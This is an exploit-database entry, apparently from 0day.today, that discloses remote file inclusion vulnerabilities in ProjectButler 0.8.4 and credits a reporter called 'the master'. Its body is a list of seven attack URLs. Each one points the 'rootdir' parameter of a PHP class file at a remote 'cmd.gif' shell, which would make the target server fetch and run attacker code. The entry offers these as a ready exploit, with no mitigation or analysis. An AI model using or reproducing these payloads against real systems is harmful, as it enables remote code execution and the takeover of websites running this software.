ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities

2006-08-14T00:00:00
ID 1337DAY-ID-691
Type zdt
Reporter the master
Modified 2006-08-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities
====================================================================



########################################################################
#  projectbutler-0.8.4  Remote File Inclusion Vulnerability
#
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################




#  0day.today [2018-02-17]  #